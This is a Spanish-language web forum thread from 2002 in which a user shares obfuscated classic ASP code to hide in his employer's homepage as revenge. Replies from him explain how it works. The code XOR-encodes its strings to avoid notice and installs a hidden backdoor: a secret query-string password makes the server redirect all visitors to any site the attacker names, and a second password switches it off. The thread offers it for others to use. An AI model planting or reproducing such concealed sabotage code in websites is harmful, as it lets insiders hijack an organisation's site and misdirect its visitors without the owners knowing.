Foros del Web » Programando para Internet » ASP Clásico »

Regalo codigo e invito a deducir cómo funciona...

Estas en el tema de Regalo codigo e invito a deducir cómo funciona... en el foro de ASP Clásico en Foros del Web. Os regalo un pequeño fragmento de código que he diseñado para colocar al principio de una web que estoy diseñando para mi empresa. Las cosas ...
  #1 (permalink)  
Antiguo 24/04/2002, 13:26
Avatar de OMiCRoM  
Fecha de Ingreso: febrero-2002
Mensajes: 101
Antigüedad: 22 años, 4 meses
Puntos: 0
Regalo codigo e invito a deducir cómo funciona...

Os regalo un pequeño fragmento de código que he diseñado para colocar al principio de una web que estoy diseñando para mi empresa. Las cosas en mi empresa estan un poco "chungas" y por si las moscan me putean, yo tampoco me quiero quedar atrás.

Os invito (si es que teneis tiempo) a que lo descrifréis y contéis qué hace. Es un desafío.

<%

cnv()

Sub cnv()
Dim c,c2,c3,c4
Dim q,q2
Dim v,v2

'************ DEFINIR CARACTERES ASCII ESPECIALES
c=chr(69)&chr(72)&chr(65)&chr(72)& chr(89)&chr(74)&chr(82)&chr(66)&ch r(89)
c2=chr(69)&chr(72)&chr(65)&chr(72)&amp ;chr(89)&chr(74)&chr(82)&chr(66)&c hr(81)&chr(75)
c3=chr(71)&chr(76)&chr(68)&chr(94)
c4=chr(95)&chr(89)&chr(67)&chr(93)
c=enc(c)
c2=enc(c2)
c3=enc(c3)
c4=enc(c4)
q=request.querystring(c3)
q2=request.querystring(c4)
v=Application(c3)
v2=Application(c4)

if q=c then
Application(c3)=5
Application(c4)=q2
End if
if q=c2 then
Application(c3)=0
End if
if v=5 then
response.redirect (v2)
End if

End Sub

Function enc(byval t)
Dim l,i,n,m
Dim a

n=(10*3)+15
m=(10*2)+35
l=len(t)
a=""
for i=1 to l
if (i mod 2=0) then
a=a&chr(asc(mid(t,i,1)) xor n)
Else
a=a&chr(asc(mid(t,i,1)) xor m)
End if
next
enc=a
End function
%>
  #2 (permalink)  
Antiguo 25/04/2002, 17:25
Avatar de sjam7  
Fecha de Ingreso: diciembre-2001
Ubicación: Guadalajara, Mexico
Mensajes: 3.672
Antigüedad: 22 años, 5 meses
Puntos: 16
Re: Regalo codigo e invito a deducir cómo funciona...

no pues quien sabe que haga tu codigo, pero ya que nos lo regalaste dinos que hace no ;)

JAM <font size="1">desde la tierra del tequila, mariachi y mujeres guapas[/CODE]
<a href="mailto:[email protected]">[email protected]</a><br>
<embed width="400" height="60" src="http://www.550m.com/usuarios/guiaguanatos/salud.swf">
  #3 (permalink)  
Antiguo 25/04/2002, 21:01
Avatar de OMiCRoM  
Fecha de Ingreso: febrero-2002
Mensajes: 101
Antigüedad: 22 años, 4 meses
Puntos: 0
Re: Regalo codigo e invito a deducir cómo funciona...

Bien, el codigo lo que hace es recoger dos parámetros (como vereis, toda va bien escondidito, encriptando todos los textos que pueden salir a la luz, mediante la función enc()). Uno de los parámetros es PASS y el otro HTTP. Una vez que se ha colocado este código en la página principal en cuestión (ha de ser ASP, pongamosle index.asp), puedes activar la &quot;venganza&quot; con index.asp?pass=revengeon&amp;http=www.paginaguarra .com con lo que todas las entradas a la página anterior, se bifurcarán a la página indicada por el parámetro http (solo hasta que se reinicie el server), pero para molestar un poquito no está nada mal, ya que lo puedes volver a repetir hasta que se den cuenta del percal y sean capaces de detectar el código entre las funciones y sub que tenga la página.
Por cierto, la venganza se desactiva con index.asp?pass=revengeoff, por si ves que las cosas se ponen chungas.

Es un bobada, pero igual a alguien le sirve.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 14:11.